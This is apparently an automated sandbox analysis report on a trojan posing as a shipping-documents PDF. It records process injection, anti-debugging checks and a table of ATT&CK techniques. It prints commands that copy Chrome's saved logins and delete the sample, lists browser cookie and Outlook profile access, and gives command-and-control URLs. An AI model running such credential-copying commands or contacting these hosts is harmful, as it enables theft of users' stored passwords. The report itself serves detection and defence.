      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F273EFC mov eax, dword ptr fs:[00000030h]13_2_1F273EFC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F257EC3 mov eax, dword ptr fs:[00000030h]13_2_1F257EC3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F257EC3 mov ecx, dword ptr fs:[00000030h]13_2_1F257EC3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BED0 mov eax, dword ptr fs:[00000030h]13_2_1F20BED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CED0 mov ecx, dword ptr fs:[00000030h]13_2_1F25CED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F211ED8 mov eax, dword ptr fs:[00000030h]13_2_1F211ED8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F299ED2 mov eax, dword ptr fs:[00000030h]13_2_1F299ED2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A1D2E mov eax, dword ptr fs:[00000030h]13_2_1F2A1D2E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCD10 mov eax, dword ptr fs:[00000030h]13_2_1F1FCD10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCD10 mov ecx, dword ptr fs:[00000030h]13_2_1F1FCD10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F0D01 mov eax, dword ptr fs:[00000030h]13_2_1F1F0D01
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BD08 mov eax, dword ptr fs:[00000030h]13_2_1F28BD08
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BD08 mov eax, dword ptr fs:[00000030h]13_2_1F28BD08
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CD00 mov eax, dword ptr fs:[00000030h]13_2_1F25CD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CD00 mov eax, dword ptr fs:[00000030h]13_2_1F25CD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F268D0A mov eax, dword ptr fs:[00000030h]13_2_1F268D0A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFD20 mov eax, dword ptr fs:[00000030h]13_2_1F1CFD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov ecx, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F254A57 mov eax, dword ptr fs:[00000030h]13_2_1F254A57
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28DAAF mov eax, dword ptr fs:[00000030h]13_2_1F28DAAF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F277ABE mov eax, dword ptr fs:[00000030h]13_2_1F277ABE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBA80 mov eax, dword ptr fs:[00000030h]13_2_1F1CBA80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209ABF mov eax, dword ptr fs:[00000030h]13_2_1F209ABF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F286A80 mov eax, dword ptr fs:[00000030h]13_2_1F286A80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4AE8 mov eax, dword ptr fs:[00000030h]13_2_1F2A4AE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0ACE mov eax, dword ptr fs:[00000030h]13_2_1F1E0ACE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0ACE mov eax, dword ptr fs:[00000030h]13_2_1F1E0ACE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250AFF mov eax, dword ptr fs:[00000030h]13_2_1F250AFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FDAC0 mov eax, dword ptr fs:[00000030h]13_2_1F1FDAC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3AF6 mov eax, dword ptr fs:[00000030h]13_2_1F1E3AF6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFAEC mov edi, dword ptr fs:[00000030h]13_2_1F1CFAEC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0AED mov eax, dword ptr fs:[00000030h]13_2_1F1D0AED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F0AEB mov eax, dword ptr fs:[00000030h]13_2_1F1F0AEB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Process queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Code function: 0_2_024506CE rdtsc 0_2_024506CE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Process token adjusted: Debug
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Code function: 0_2_0245BF4C LdrInitializeThunk,0_2_0245BF4C

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe File created: shmhprg0nvltzt.exe.16.dr
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF66E4A0000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 970000
      Source: C:\Windows\SysWOW64\chkdsk.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF66E4A0000
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Thread register set: target process: 4908
      Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 4908
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Process created: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe"
      Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe Process created: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2690597696.00000000055E1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000010.00000000.2493399478.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2442798795.0000000000E59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2550675454.0000000000E59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman'
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
      Source: explorer.exe, 00000010.00000000.2444951633.00000000016E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2495510698.00000000016E1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2681931974.00000000016E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: jProgram Manager
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

      Stealing of Sensitive Information

      Source: Yara match File source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

      Remote Access Functionality

      Source: Yara match File source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
      | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
      | Default Accounts | 1 Shared Modules | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 12 Obfuscated Files or Information | LSASS Memory | 6 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
      | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | 712 Process Injection | 1 Software Packing | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
      | Local Accounts | At (Windows) | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 421 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 25 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 22 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
      | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 File Deletion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
      | External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
      | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 22 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
      | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
      | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 712 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

      [Behavior graph. ID: 575819; Sample: MV SEA VIKING DOCUMENTS.pdf.exe; Start date: 21/02/2022; Architecture: WINDOWS; Score: 100]

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | MV SEA VIKING DOCUMENTS.pdf.exe | 6% | Virustotal | | Browse |
      | MV SEA VIKING DOCUMENTS.pdf.exe | 14% | ReversingLabs | Win32.Trojan.Shelsy | |

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exe | 14% | ReversingLabs | Win32.Trojan.Shelsy | |
      | C:\Users\user\AppData\Local\Temp\cliconfg.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll | 0% | Metadefender | | Browse |
      | C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll | 0% | Metadefender | | Browse |
      | C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\provmigrate.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\raschapext.dll | 0% | ReversingLabs | | |
      | C:\Users\user\AppData\Local\Temp\usp10.dll | 0% | Metadefender | | Browse |
      | C:\Users\user\AppData\Local\Temp\usp10.dll | 0% | ReversingLabs | | |

      | Source | Detection | Scanner | Label | Link | Download |
      |---|---|---|---|---|---|
      | 33.0.firefox.exe.2234796c.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File |
      | 21.2.chkdsk.exe.594796c.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File |
      | 33.0.firefox.exe.2234796c.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File |
      | 33.2.firefox.exe.2234796c.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File |

      | Source | Detection | Scanner | Label | Link |
      |---|---|---|---|---|
      | vaughnediting.com | 4% | Virustotal | | Browse |
      | www.nagradi7.com | 0% | Virustotal | | Browse |
      SourceDetectionScannerLabelLink
      https://powerpoint.office.comer0%Avira URL Cloudsafe
      http://www.easypeasy.community/be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H70%Avira URL Cloudsafe
      http://www.waktuk.com/be4o/100%Avira URL Cloudmalware
      http://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL0%Avira URL Cloudsafe
      https://excel.office.comt0%Avira URL Cloudsafe
      http://www.rsxrsh.com/be4o/100%Avira URL Cloudmalware
      http://www.7bkj.com/be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.itservon.com/be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL0%Avira URL Cloudsafe
      http://www.vendasdigitaisonline.com/be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.neonewway.club/be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.mariachinuevozacatecas24-7.com/be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.dreamintelligent.com/be4o/0%Avira URL Cloudsafe
      http://www.brainymortgage.info/be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g0%Avira URL Cloudsafe
      http://www.ooo-club.com0%Avira URL Cloudsafe
      http://www.antoniopasciuti.com/be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN00%Avira URL Cloudsafe
      http://www.noireimpactcollective.net/be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0100%Avira URL Cloudmalware
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
